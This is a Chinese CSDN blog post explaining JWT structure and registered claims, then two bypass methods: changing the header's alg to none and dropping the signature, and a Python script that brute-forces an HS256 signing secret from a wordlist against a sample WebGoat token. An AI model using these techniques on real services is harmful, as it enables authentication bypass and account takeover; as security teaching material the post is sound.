JSON Web Token JWT几种简单的绕过方法_jwt绕过

最新推荐文章于 2024-09-26 17:23:32 发布
最新推荐文章于 2024-09-26 17:23:32 发布
阅读量287 收藏 3
点赞数 5
文章标签: json 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_87298578/article/details/142434463
版权

JWT常被用于前后端分离,可以和Restful API配合使用,常用于构建身份认证机制
在这里插入图片描述

如图为JWT加密后的示例,JWT再由后端返回至前端后,由前端封装到HTTP Header中
访问https://jwt.io/可以进行解码
在这里插入图片描述

如图所示JWT由三部分构成,分别是header,payload和signature,在这三者之间由"."连接。

header

header承载两部分信息
typ:声明自己是jwt的类型
alg:声明使用的加密算法
在上图中,alg标注的为HS256,即HMAC-SHA256
这之后将头部进行base64加密,就构成了第一部分

payload

第二部分为payload,payload中的声明较为自由,是根据业务需要存放有效信息的地方,通常而言,标准中注册的声明有:

iss: jwt签发者
sub: jwt所面向的用户
aud: 接收jwt的一方
exp: jwt的过期时间,这个过期时间必须要大于签发时间
nbf: 定义在什么时间之前,该jwt都是不可用的.
iat: jwt的签发时间
jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击。

其余的自由发挥即可

signature

jwt的第三部分是一个签证信息,这个签证信息由三部分组成

header (base64后的)
payload (base64后的)
secret

这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分

将这三部分用.连接成一个完整的字符串,构成了最终的jwt

JWT工作流程

在这里插入图片描述

JWT绕过

仅适用于不作防护的铸币网站

将加密算法修改为none

在这里插入图片描述
将header中alg改为none,修改payload,去掉第三部分即可

令牌爆破
import jwt
import termcolor
 
jwt_str = R"eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDg0MDg1NywiZXhwIjoxNjQwODQwOTE3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.7HdANKeLioK-GsBUY9af80gODrlkFURDDE6u0LbmWZw"
with open("20k.txt") as f:
    for line in f:
        key_ = line.strip()
        try:
            jwt.decode(jwt_str, verify=True, algorithms="HS256", key=key_)
            print('\r', '找到秘钥--->', termcolor.colored(key_, "green"), "<---")
            break
        except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuerError, jwt.exceptions.ImmatureSignatureError):
            print('\r', '找到秘钥--->', termcolor.colored(key_, "green"), "<---")
            break
        except jwt.exceptions.InvalidSignatureError:
            print('\r', ' ' \* 64, '\r\btry', key_, end='', flush=True)
            continue
    else:
        print('\r', '\b抱歉!没找到秘钥')
2401_87298578
关注
JSON Web Token JWT几种简单绕过方法
mirocky的博客
12-21 859
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。如图所示JWT由三部分构成,分别是header,payload和signature,在这三者之间由"."连接。在payload中,iot代表JWT生成时间,exp代表JWT失效时间,延长exp时间也可进行绕过。如图为JWT加密后的示例,JWT再由后端返回至前端后,由前端封装到HTTP Header中。
JSON Web Token JWT几种简单绕过方法_jwt绕过(1),2024年最新6年菜鸟开发面试字节跳动网络安全研发岗
2301_79772893的博客
04-09 360
header承载两部分信息typ:声明自己是jwt的类型alg:声明使用的加密算法在上图中,alg标注的为HS256,即HMAC-SHA256这之后将头部进行base64加密,就构成了第一部分。
JSON Web Token JWT几种简单绕过方法_jwt绕过(1)
m0_61067876的博客
04-07 1007
payload (base64后的)secret这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分将这三部分用.连接成一个完整的字符串,构成了最终的jwt
JSON Web Token JWT几种简单绕过方法_jwt绕过(2),网络安全开发面试
2401_83739411的博客
04-15 927
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。还有兄弟不知道网络安全面试可以提前刷题吗?如图所示JWT由三部分构成,分别是header,payload和signature,在这三者之间由"."连接。如图为JWT加密后的示例,JWT再由后端返回至前端后,由前端封装到HTTP Header中。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
JSON Web Token JWT几种简单绕过方法_jwt绕过,三年老网络安全经验面经
m0_60721860的博客
04-05 877
JWT常被用于前后端分离,可以和Restful API配合使用,常用于构建身份认证机制如图为JWT加密后的示例,JWT再由后端返回至前端后,由前端封装到HTTP Header中访问可以进行解码如图所示JWT由三部分构成,分别是header,payload和signature,在这三者之间由"."连接。
json web tokenJWT绕过
向阳-Y.的博客
03-16 4835
前期准备 本次试验用到靶场WebGoat,如何安装WebGoat? Broken authentication——JWT tokens的第五题,首先随便切换一个用户,例如Tom,再点击删除图标,进行抓包。 抓到的包如下图 将其中的JWT值取出来,放到JWT在线解密平台上 这里分为了三个部分,头部,声明,签名(分别对应红、紫、蓝),签名出需要秘钥进行加密,但我们没有秘钥应该如何绕过呢? JWT绕过 1.将头部信息的alg值改为none,并进行base64加密 2.将声明部分的admin值改为true
JSON Web Token (JWT): 理解与应用
yuanchun的知识整理
08-16 1275
JSON Web Token (JWT)
Json web tokenJWT)攻防
网安君的博客
05-09 971
JWT介绍 JSON Web Tokens,是一种基于JSON的、用于在网络上声明某种主张的令牌(token)。JWT通常由三部分组成: 头信息(header), 消息体(payload)和签名(signature)。它是一种用于双方之间传递安全信息的表述性声明规范。JWT作为一个开放的标准(RFC 7519),定义了一种简洁的、自包含的方法,从而使通信双方实现以JSON对象的形式安全的传递信息。 “令牌使用私人秘密或公钥/私钥进行签名。例如,服务器可以生成具有“以管理员身份登录”声明的令牌并将其提供给客
JWTJson Web Token)详解
Vinjcent
09-09 1423
JSON Web TokenJWT)is an open standard()that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.This information can be verified and trusted because it is digitally signed. JWTs can be signed us
c# JSON WEB TOKEN JWT.dll
07-18
生成token工具,webapi 接口 token JWTWeb API身份验证Json Web Token(jwt)是一种不错的身份验证及授权方案,简单的说就是调用端调用api时,附带上一个由api端颁发的token,以此来验证调用者的授权信息。
php实现JWT(json web token)鉴权实例详解
01-03
JWTjson web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法...
JSON Web Token JWT几种简单绕过方法_jwt绕过,2024年最新OMG学它
2401_83739434的博客
04-15 503
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击。exp: jwt的过期时间,这个过期时间必须要大于签发时间。jwt的第三部分是一个签证信息,这个签证信息由三部分组成。将这三部分用.连接成一个完整的字符串,构成了最终的jwt。nbf: 定义在什么时间之前,该jwt都是不可用的.
前台项目启动/打包报错 Error: error:0308010C:digital envelope routines::unsupported
最新发布
BigBigHang的博客
09-26 163
前台项目启动/打包报错 Error: error:0308010C:digital envelope routines::unsupported
JS的基础语法
weixin_61898502的博客
09-24 1072
空(null)
深入探索与实战:高效利用苏宁商品详情API实现精准数据抓取与解析技术
API19970108110的博客
09-23 424
在电商平台的开发中,获取商品详情是构建用户购物体验的重要一环。苏宁作为国内领先的电商平台,提供了丰富的商品信息和API接口供开发者使用。本文将介绍如何通过苏宁的商品详情接口获取特定商品的详细信息,并给出Python代码示例。
Latex和Vscode安装和配置
bulletstart的博客
09-25 872
介绍latex和vscode的安装和配置
使用SonarQube扫描ESP32项目,如何生成build-wrapper-dump.json
sniperkang的博客
09-20 340
解决ESP32项目生成SonarQube扫描所需build-wrapper-dump.json的问题
Spring Data Rest 远程命令执⾏命令(CVE-2017-8046) 靶场攻略
shw_yzh的博客
09-23 296
靶场环境靶场环境。
jwt怎么获取当前登录用户_获取jwt(json web token)中存储的用户信息
05-12
在上面的示例中,使用 `jwt.decode()` 方法解析 JWT,并将第二个参数 `verify` 设置为 `False`,表示不进行签名验证。然后从 payload 中获取用户信息。 需要注意的是,JWT 只是一种存储用户信息的方式,具体实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值